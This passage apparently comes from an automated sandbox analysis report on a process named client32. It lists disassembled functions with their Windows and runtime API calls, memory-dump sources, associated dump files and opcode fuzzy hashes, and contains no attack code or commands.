                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _fgets_strpbrk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3772100082-0
                                                                                                                                        • Opcode ID: 015b6b6cfba45a31106f92d5bcef8a3181b24b30841907f438b898b38d21e6b6
                                                                                                                                        • Instruction ID: ac3d813d9d06cefe383cdbf7085aeea3aa9dbaa4d672942e3f5a9e9bf28be114
                                                                                                                                        • Opcode Fuzzy Hash: 015b6b6cfba45a31106f92d5bcef8a3181b24b30841907f438b898b38d21e6b6
                                                                                                                                        • Instruction Fuzzy Hash: F0119175C08B59CADB21CF148C507EABFFCAF55346F1841D4D88967241EB72AA86CF50
                                                                                                                                        Function 11087510 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 1108752F
                                                                                                                                        • InitializeCriticalSection.KERNEL32(?,?,1117CF74,?), ref: 110875A0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalInitializeSection_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 453477542-0
                                                                                                                                        • Opcode ID: e4e878cd1fd140643e157a6277fb3a3afa25cdd61848936763f5ef659ccc3049
                                                                                                                                        • Instruction ID: 75295544d9195e04375e6fd21bc40551df4152833ee3a01bc0b81666db33725f
                                                                                                                                        • Opcode Fuzzy Hash: e4e878cd1fd140643e157a6277fb3a3afa25cdd61848936763f5ef659ccc3049
                                                                                                                                        • Instruction Fuzzy Hash: 711157B0902B148FC3A4CF7A89816C6FAE5BB48315F90892E96EEC2200DB716564CF91
                                                                                                                                        Function 11140AB0 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11140AD1
                                                                                                                                        • ExtractIconExA.SHELL32(?,00000000,00060153,00090289,00000001), ref: 11140B08
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExtractFileIconModuleName
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3911389742-0
                                                                                                                                        • Opcode ID: 01063847e38c2fa817ea410c82c91b75b06626eb0c876785d9cfe351996907d3
                                                                                                                                        • Instruction ID: fbd1f7f6eca67a3d4699d4d052ae62d0c626dfd316a41b503206f924cf5b890f
                                                                                                                                        • Opcode Fuzzy Hash: 01063847e38c2fa817ea410c82c91b75b06626eb0c876785d9cfe351996907d3
                                                                                                                                        • Instruction Fuzzy Hash: EFF02478A4511C9FEB48CFE4CC86FBDF769E784708F808269EE12871C4CE7029488740
                                                                                                                                        Function 11160535 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 11165ABF: __getptd_noexit.LIBCMT ref: 11165ABF
                                                                                                                                        • __lock_file.LIBCMT ref: 1116057C
                                                                                                                                        • __fclose_nolock.LIBCMT ref: 11160587
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock_file
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2959217138-0
                                                                                                                                        • Opcode ID: 9c94bd5ad8adf114722855a36b49f4cfe2d274427d0abc081df420240f29e7a8
                                                                                                                                        • Instruction ID: c99a5f40794e7bd6d5a1a4a2a70ed171e4b9561b0896b3e5cf790a4aaee0ba1f
                                                                                                                                        • Opcode Fuzzy Hash: 9c94bd5ad8adf114722855a36b49f4cfe2d274427d0abc081df420240f29e7a8
                                                                                                                                        • Instruction Fuzzy Hash: A7F09035D11B179AD710AB7598047AEFBB86F0133CF118208C4649A1D0CBFEAA21DB96
                                                                                                                                        Function 68906C1E Relevance: 3.0, APIs: 2, Instructions: 30sleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 68906C26
                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 68906C5B
                                                                                                                                          • Part of subcall function 68906940: GetTickCount.KERNEL32 ref: 68906950
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountTick$Sleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4250438611-0
                                                                                                                                        • Opcode ID: 4301366feb8217a2992b538272eda934b61af3f24ea625bc93d40e5757dcf881
                                                                                                                                        • Instruction ID: c7fbbe0acca4dce01d1551aad28d16a05e35288493411156f80356d5d49dac34
                                                                                                                                        • Opcode Fuzzy Hash: 4301366feb8217a2992b538272eda934b61af3f24ea625bc93d40e5757dcf881
                                                                                                                                        • Instruction Fuzzy Hash: 77F05E32608714CBCF35EF688D5476CB2A5EB6231DF51002EC722D6A90C774D8C0CB02
                                                                                                                                        Function 688F63A0 Relevance: 3.0, APIs: 2, Instructions: 10sleepnetworkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • WSACancelBlockingCall.WSOCK32 ref: 688F63A9
                                                                                                                                        • Sleep.KERNEL32(00000032), ref: 688F63B3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BlockingCallCancelSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3706969569-0
                                                                                                                                        • Opcode ID: 2982aa9521069b487c3f28292a93bf96ab0de260f8cc77dba1d784b3dc3a3fe4
                                                                                                                                        • Instruction ID: 7e2e6f929df294fb26add82bb4146f669e36ded0bebe58b0ff000dd130a9f00b
                                                                                                                                        • Opcode Fuzzy Hash: 2982aa9521069b487c3f28292a93bf96ab0de260f8cc77dba1d784b3dc3a3fe4
                                                                                                                                        • Instruction Fuzzy Hash: 83B092682991125AAB105375090622A20881FA528BFD409702B92C8885EF20C101A022
                                                                                                                                        Function 11141510 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 11141430: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,76947310), ref: 11141457
                                                                                                                                          • Part of subcall function 1116076B: __fsopen.LIBCMT ref: 11160778
                                                                                                                                        • GetLastError.KERNEL32(?,0237B878,000000FF,?), ref: 11141545
                                                                                                                                        • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,0237B878,000000FF,?), ref: 11141555
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3768737497-0
                                                                                                                                        • Opcode ID: 81746d2f9acf91c020a5a3f6663b8b5426944b6bd56996d575389eba168b1fdf
                                                                                                                                        • Instruction ID: 7e8c35b226adcaf9db255fe0cc88c7d1a69018d15e21d4c5589b92f150ef4e8a
                                                                                                                                        • Opcode Fuzzy Hash: 81746d2f9acf91c020a5a3f6663b8b5426944b6bd56996d575389eba168b1fdf
                                                                                                                                        • Instruction Fuzzy Hash: 19114876F00615ABDB119F90CDC0AAEF778EF46A19F244164EC06DB200E734BE518BE2
                                                                                                                                        Function 11010980 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 11010A34
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LockitLockit::_std::_
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3382485803-0
                                                                                                                                        • Opcode ID: f6d0a54566054b589c6c4caa2954ea7599f026ea747ae3b3f194ddc99e0da180
                                                                                                                                        • Instruction ID: a25f3913c8117ba577326b804e25134151bce6e6eea091deb2a1df2ca1a14b49
                                                                                                                                        • Opcode Fuzzy Hash: f6d0a54566054b589c6c4caa2954ea7599f026ea747ae3b3f194ddc99e0da180
                                                                                                                                        • Instruction Fuzzy Hash: 7F516D75A00645DFDB04CF98C980AADBBF6FF89318F24829DD5459B389C776E902CB90
                                                                                                                                        Function 1113F670 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,76938400,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: QueryValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3660427363-0
                                                                                                                                        • Opcode ID: a232fc1abe2ed2d7d844c38d6296ee0920c29362aec6298465a62cb418f01d82
                                                                                                                                        • Instruction ID: 10a2649455158eed3fdc33ccecd10e2613defaba2ffe2c5b463718ad866645ae
                                                                                                                                        • Opcode Fuzzy Hash: a232fc1abe2ed2d7d844c38d6296ee0920c29362aec6298465a62cb418f01d82
                                                                                                                                        • Instruction Fuzzy Hash: 4211ECB67242475FEB11CD24D690B9EF756EFC5339F20812EE58587518D2319882CB53
                                                                                                                                        Function 110F8740 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,1117CF74), ref: 110F876D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InformationToken
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4114910276-0
                                                                                                                                        • Opcode ID: 3ed54ede1b3f10cca51033c0e31936367da5c7eb08a16c35f026113f9e1de554
                                                                                                                                        • Instruction ID: 4286fe34f75cea7b88237b7f19c57be592dd9146774f55c5736f82da2c6cd1b6
                                                                                                                                        • Opcode Fuzzy Hash: 3ed54ede1b3f10cca51033c0e31936367da5c7eb08a16c35f026113f9e1de554
                                                                                                                                        • Instruction Fuzzy Hash: 9A118A71E0022D9BDB51CBA8DC557EEB7E8AB49304F0040E9E909D7340DB70AE448B91
                                                                                                                                        Function 6891A082 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,68916F16,00000000,?,6891D40B,00000001,68916F16,00000000,00000000,00000000,?,68916F16,00000001,00000214), ref: 6891A0C5
                                                                                                                                          • Part of subcall function 689160F9: __getptd_noexit.LIBCMT ref: 689160F9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
